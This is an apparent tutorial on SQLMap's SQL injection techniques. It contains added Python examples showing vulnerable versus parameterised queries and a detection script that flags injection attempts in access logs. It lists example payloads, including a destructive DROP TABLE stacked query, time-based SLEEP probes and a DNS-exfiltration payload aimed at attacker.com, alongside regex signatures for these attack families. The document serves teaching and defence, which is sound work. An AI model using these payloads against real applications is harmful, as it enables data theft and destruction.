Objective:
To provide a detailed, step-by-step guide on the various SQL injection types supported by SQLMap, enabling learners to understand and identify each type effectively.
Introduction to SQLMap
SQLMap is a powerful penetration testing tool for detecting and exploiting SQL injection vulnerabilities.
It supports a wide range of SQL injection techniques, making it a comprehensive tool for testing web application security.
Listing Supported SQL Injection Types
Use the command sqlmap -hh to view the full list of supported SQL injection techniques. The --technique option lets you specify which techniques SQLMap should use. Its default value is "BEUSTQ", which represents the following techniques:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
Boolean-based Blind SQL Injection
Example payload:
AND 1=1
SQLMap exploits this vulnerability by differentiating between TRUE and FALSE query results.
It retrieves 1 byte of information per request by comparing server responses.
TRUE results have minimal or no difference from the regular server response.
FALSE results have substantial differences from the regular server response.
Boolean-based blind SQL injection is considered the most common type in web applications.
Error-based SQL Injection
Example payload:
AND GTID_SUBSET(@@version,0)
This technique relies on the DBMS returning error messages as part of the server response.
SQLMap uses specialized payloads targeting functions that cause known misbehaviors in specific DBMSes.
It supports error-based SQL injection for various DBMSes, including MySQL, PostgreSQL, Oracle, and more.
Error-based SQLi is faster than most other types, as it can retrieve data in chunks (e.g., 200 bytes) per request.
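The following Python code is an added example, not code from the page or from the sqlmap project. It uses an in-memory SQLite database in place of the DBMSes named above, and the function names lookup_vulnerable, lookup_safe, oracle_exists and error_leaks are hypothetical. It shows the two conditions the Boolean-based and Error-based sections describe: a TRUE/FALSE payload pair that produces observably different results, and a malformed input that surfaces a database error to the caller. Both conditions disappear when the same lookup is written with a parameterised query.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: a tiny users table standing in for the
    # application database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # Hypothetical vulnerable lookup: string concatenation puts the input
    # into the SQL text, so the caller controls the WHERE clause.
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    # Hypothetical hardened lookup: the input is bound as data and cannot
    # change the statement's structure.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (name,)
    ).fetchall()


def oracle_exists(lookup, conn: sqlite3.Connection, base: str) -> bool:
    """True if a TRUE payload and a FALSE payload give different results,
    i.e. the boolean oracle that blind SQLi relies on is present."""
    true_rows = lookup(conn, base + "' AND 1=1--")
    false_rows = lookup(conn, base + "' AND 1=2--")
    return true_rows != false_rows


def error_leaks(lookup, conn: sqlite3.Connection, probe: str) -> bool:
    """True if a malformed input surfaces a database error to the caller,
    the condition error-based SQLi needs."""
    try:
        lookup(conn, probe)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    # Expected: the concatenated query exposes both oracles, the bound one neither.
    print("vulnerable: boolean oracle =", oracle_exists(lookup_vulnerable, conn, "alice"))
    print("vulnerable: error leak     =", error_leaks(lookup_vulnerable, conn, "alice'"))
    print("safe:       boolean oracle =", oracle_exists(lookup_safe, conn, "alice"))
    print("safe:       error leak     =", error_leaks(lookup_safe, conn, "alice'"))
```

The defensive point is that the "minimal difference" versus "substantial difference" the Boolean-based section describes is a property of the application, not of the attacker: once the lookup binds its parameter, the TRUE and FALSE payloads are just two non-existent user names and return the same empty result, and a stray quote is stored, not parsed.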
UNION Query-based SQL Injection
Example payload:
UNION ALL SELECT 1,@@version,3
This technique extends the original vulnerable query with the results of injected statements using UNION.
If the original query results are rendered in the response, the attacker can retrieve additional data from the injected statements.
UNION query-based SQLi is considered the fastest type, as it can potentially retrieve an entire database table with a single request.
Stacked Queries SQL Injection
Example payload:
; DROP TABLE users
Also known as "piggy-backing," this technique injects additional SQL statements after the vulnerable one.
It is useful for running non-query statements like INSERT, UPDATE, or DELETE.
The vulnerable platform must support stacking queries (e.g., Microsoft SQL Server and PostgreSQL).
SQLMap can use stacked queries for advanced features like executing OS commands and retrieving data.
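The following Python code is an added example, not code from the page or from the sqlmap project. It uses an in-memory SQLite database through Python's sqlite3 module and the page's stacked payload, constructed here as a string; the function names lookup_multi_statement, lookup_single_statement and lookup_safe are hypothetical. It shows the caveat in the section above from the application side: the same concatenated query only lets the second statement run when the API used to execute it accepts more than one statement (executescript), while execute() refuses the stacked input and a parameterised query treats it as a plain, unmatched name.

```python
import sqlite3

# The page's stacked-queries payload, constructed for this demo.
STACKED_PAYLOAD = "alice'; DROP TABLE users--"


def make_db() -> sqlite3.Connection:
    # Constructed sample data: a users table that the payload tries to drop.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users (name) VALUES ('alice')")
    conn.commit()
    return conn


def users_table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None


def lookup_multi_statement(conn: sqlite3.Connection, name: str) -> str:
    # Hypothetical vulnerable lookup built on a multi-statement API:
    # executescript() runs every statement in the string, so the injected
    # DROP TABLE after the semicolon is executed.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    conn.executescript(sql)
    return "executed"


def lookup_single_statement(conn: sqlite3.Connection, name: str) -> str:
    # Same concatenation, but through execute(), which the sqlite3 module
    # limits to one statement. The injection flaw is still present (the
    # caller still controls the SQL); only stacking is refused. Older
    # Python versions raise sqlite3.Warning here, newer ones
    # sqlite3.ProgrammingError, so both are caught.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    try:
        conn.execute(sql).fetchall()
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        return "refused: " + str(exc)


def lookup_safe(conn: sqlite3.Connection, name: str) -> str:
    # Hypothetical hardened lookup: the payload is bound as data and simply
    # matches no row.
    conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()
    return "executed"


def demo() -> dict:
    """Run the payload through each variant on a fresh database and report
    whether the users table survived."""
    results = {}
    for label, fn in [
        ("executescript", lookup_multi_statement),
        ("execute", lookup_single_statement),
        ("parameterised", lookup_safe),
    ]:
        conn = make_db()
        fn(conn, STACKED_PAYLOAD)
        results[label] = users_table_exists(conn)
    return results


if __name__ == "__main__":
    # Expected: {'executescript': False, 'execute': True, 'parameterised': True}
    print(demo())
```

The execute() result is worth reading carefully: the table survives only because the driver declines to stack statements, not because the query is safe. Data extraction through the remaining techniques is still possible against that variant, so "stacking not supported" is a limitation on one technique, not a fix.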
Time-based Blind SQL Injection
Example payload:
AND 1=IF(2>1,SLEEP(5),0)
Similar to boolean-based blind SQLi, this technique uses response time to differentiate between TRUE and FALSE.
TRUE responses have a noticeable difference in response time compared to regular server responses.
FALSE responses have response times indistinguishable from regular responses.
Time-based blind SQLi is slower than boolean-based blind SQLi but is used when the latter is not applicable (e.g., non-query statements).
Inline Queries SQL Injection
Example payload:
SELECT (SELECT @@version) from
This technique embeds a query within the original query.
It is uncommon and requires the vulnerable web application to be written in a specific way.
SQLMap supports this type of SQL injection.
Out-of-band SQL Injection
Example payload:
LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))
This advanced technique is used when other types are unsupported or too slow.
SQLMap supports out-of-band SQLi through "DNS exfiltration."
It forces the server to request non-existent subdomains containing the SQL response.
SQLMap collects these failing DNS requests and reassembles the entire SQL response from them.
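The following Python code is an added example from the defender's side, not code from the page or from the sqlmap project. It takes the technique families described in the sections above (B, E, U, S, T, Q and out-of-band, labelled O here) and tags web server access-log entries with the family their query string resembles. The log lines are constructed for the example, the regular expressions are a small hand-written set rather than sqlmap's own payload list, and the names classify, scan and summarize are hypothetical. Beyond labelling single requests, it groups hits per source address: one client cycling through several families within seconds is the footprint of an automated tester working through a technique list such as the default "BEUSTQ".

```python
import re
from urllib.parse import unquote_plus

# Signature families keyed by the technique letter. Order matters: the more
# specific families are tested before the generic boolean tautology, so a
# time-based payload that also contains "AND" is reported as T, not B.
SIGNATURES = [
    ("U", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("S", re.compile(r";\s*(drop|insert|update|delete|exec|create)\b", re.I)),
    ("T", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("E", re.compile(r"\b(gtid_subset|extractvalue|updatexml)\s*\(", re.I)),
    ("O", re.compile(r"\bload_file\s*\(|\bxp_dirtree\b", re.I)),
    ("Q", re.compile(r"\(\s*select\b", re.I)),
    ("B", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

# Common log format: client, identd, user, [timestamp], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines: one benign request, one request per
# technique family using the page's example payloads (URL-encoded), and a
# benign search from a second client.
LOG_LINES = [
    '10.0.0.7 - - [12/Mar/2024:10:00:01 +0000] "GET /products.php?id=42 HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Mar/2024:10:00:02 +0000] "GET /products.php?id=42+AND+1%3D1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Mar/2024:10:00:03 +0000] "GET /products.php?id=42+AND+GTID_SUBSET(%40%40version%2C0) HTTP/1.1" 500 318',
    '10.0.0.7 - - [12/Mar/2024:10:00:04 +0000] "GET /products.php?id=42+UNION+ALL+SELECT+1%2C%40%40version%2C3 HTTP/1.1" 200 744',
    '10.0.0.7 - - [12/Mar/2024:10:00:05 +0000] "GET /products.php?id=42%3B+DROP+TABLE+users HTTP/1.1" 500 318',
    '10.0.0.7 - - [12/Mar/2024:10:00:06 +0000] "GET /products.php?id=42+AND+1%3DIF(2%3E1%2CSLEEP(5)%2C0) HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Mar/2024:10:00:07 +0000] "GET /products.php?id=(SELECT+%40%40version) HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Mar/2024:10:00:08 +0000] "GET /products.php?id=LOAD_FILE(CONCAT(%27%5C%5C%5C%5C%27%2C%40%40version%2C%27.attacker.com%5C%5CREADME.txt%27)) HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2024:10:00:09 +0000] "GET /search.php?q=android+phones HTTP/1.1" 200 2048',
]


def classify(request_path: str) -> list:
    """Return the technique letters whose signatures match the decoded path,
    most specific first. An empty list means no signature matched."""
    decoded = unquote_plus(request_path)
    return [letter for letter, rx in SIGNATURES if rx.search(decoded)]


def scan(log_lines) -> list:
    """Return (client_ip, letters) for every parseable request that matched
    at least one signature, in log order."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("path"))
        if hits:
            findings.append((m.group("ip"), "".join(hits)))
    return findings


def summarize(findings) -> dict:
    """Map each client to the distinct technique families it was seen using,
    in order of first appearance."""
    per_client = {}
    for ip, letters in findings:
        seen = per_client.setdefault(ip, "")
        for letter in letters:
            if letter not in seen:
                seen += letter
        per_client[ip] = seen
    return per_client


if __name__ == "__main__":
    findings = scan(LOG_LINES)
    for ip, letters in findings:
        print(ip, letters)
    # Expected summary: {'10.0.0.7': 'BEUSTQO'}; 10.0.0.9 never appears.
    print(summarize(findings))
```

The signatures are deliberately coarse and will not catch obfuscated or comment-split payloads; their value in a detection pipeline is the per-client grouping, which turns a handful of individually low-confidence matches into one high-confidence "automated SQL injection testing" event.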
Checkpoint Exercise
Set up a vulnerable web application with SQL injection vulnerabilities.
Use SQLMap to identify the supported SQL injection types for the application.
Attempt to exploit the application using each supported SQL injection type.
Analyze the results and understand the differences between each technique.